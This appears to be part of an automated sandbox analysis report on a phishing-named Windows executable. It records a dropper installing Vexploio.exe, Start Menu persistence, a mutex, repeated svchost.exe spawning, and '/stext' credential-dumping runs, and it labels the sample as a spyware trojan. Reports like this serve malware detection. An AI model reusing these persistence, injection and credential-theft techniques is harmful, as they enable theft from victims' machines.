              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044081D11_2_0044081D
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0041495711_2_00414957
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_004079EE11_2_004079EE
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00407AEB11_2_00407AEB
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044AA8011_2_0044AA80
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00412AA911_2_00412AA9
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00404B7411_2_00404B74
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00404B0311_2_00404B03
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044BBD811_2_0044BBD8
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00404BE511_2_00404BE5
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00404C7611_2_00404C76
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00415CFE11_2_00415CFE
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00416D7211_2_00416D72
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00446D3011_2_00446D30
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00446D8B11_2_00446D8B
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: String function: 00402ACB appears 48 times
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: String function: 004165FF appears 35 times
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: String function: 00416760 appears 69 times
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameskrumpeleverne.exeD vs INQUIRY#46789-MAY_24_PRODUCTS.exe
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameskrumpeleverne.exeD vs INQUIRY#46789-MAY_24_PRODUCTS.exe
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\physostome.Sln
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: Callers\user\AppData\Local\Temp\nsd31E2.tmp\System.dllr2x80, i 0)i.r8eywort\Superingenuity\Gravedo.Flaetake\thoroughwort.retC:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dllu\Bemangle\parsleywort\Superingenuity\physostome.SlnkeC:\Users\user\AppData\Local\Temp\nsd31E2.tmps\prayful\galeon.lnkC:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dllrasterside.ini8
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmp, Vexploio.exe, 00000006.00000002.178534922602.000000000042C000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: enuity\physostome.Sln
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000002.178257283888.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, Vexploio.exe, 00000006.00000002.178535391112.00000000006A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Superingenuity\physostome.Sln
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: q1207ser32::EnumWindows(i r2 ,i 0)i 46108672,*i 0, i 0)i.r4.r2x80, i 0)i.r8C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\physostome.Sln892user32::EnumWindows(i r2 ,i 0)i 46108672,*i 0, i 0)i.r4.r2x80, i 0)i.r8
              Source: Vexploio.exe, 00000006.00000002.178534922602.000000000040A000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: Callers\user\AppData\Local\Temp\nsv9D4E.tmp\System.dllr2x80, i 0)i.r8eywort\Superingenuity\Gravedo.Flaetake\thoroughwort.retC:\Users\user\AppData\Local\Temp\nsv9D4E.tmp\System.dllu\Bemangle\parsleywort\Superingenuity\physostome.SlnkeC:\Users\user\AppData\Local\Temp\nsv9D4E.tmps\prayful\galeon.lnkC:\Users\user\AppData\Local\Temp\nsv9D4E.tmp\System.dllrasterside.ini8
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmp, Vexploio.exe, 00000006.00000002.178534922602.000000000040A000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: u\Bemangle\parsleywort\Superingenuity\physostome.Sln
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000002.178257283888.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, Vexploio.exe, 00000006.00000002.178535391112.00000000006A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Extract: physostome.Sln... 100%
              Source: Vexploio.exe, 00000006.00000002.178534922602.000000000042C000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: Callers\user\AppData\Local\Temp\nsv9D4E.tmp\System.dllu\psychesthetic\anatinacea.freenuity\physostome.Slnke
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: Callers\user\AppData\Local\Temp\nsd31E2.tmp\System.dllu\psychesthetic\anatinacea.freenuity\physostome.Slnke
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@79/30@1/3
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,11_2_004182CE
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040320C
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040320C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,10_2_0040320C
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_004044D1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,3_2_004044D1
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,11_2_00413D4C
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_004020D1 CoCreateInstance,MultiByteToWideChar,3_2_004020D1
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,11_2_0040B58D
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\BemangleJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-RXKA3P
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Local\Temp\nsp2917.tmpJump to behavior
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\ProgramData\Vexplo\Vexploio.exeSystem information queried: HandleInformation
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Vexploio.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: Vexploio.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: Vexploio.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: Vexploio.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: Vexploio.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: Vexploio.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exeVirustotal: Detection: 29%
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exeReversingLabs: Detection: 23%
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile read: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess created: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe "C:\ProgramData\Vexplo\Vexploio.exe"
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe "C:\ProgramData\Vexplo\Vexploio.exe"
              Source: unknownProcess created: C:\ProgramData\Vexplo\Vexploio.exe "C:\ProgramData\Vexplo\Vexploio.exe"
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\natcvvveorcxxyqjtvtsuftguqn"
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\ycymwnogcaukzemncgolxsopvfffsfc"
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\ixefxgzzpimpkkartranixjgdmpglqsibv"
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess created: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe "C:\ProgramData\Vexplo\Vexploio.exe" Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe "C:\ProgramData\Vexplo\Vexploio.exe" Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\natcvvveorcxxyqjtvtsuftguqn"Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\ycymwnogcaukzemncgolxsopvfffsfc"Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\ProgramData\Vexplo\Vexploio.exe C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\ixefxgzzpimpkkartranixjgdmpglqsibv"Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: sppc.dllJump to behavior
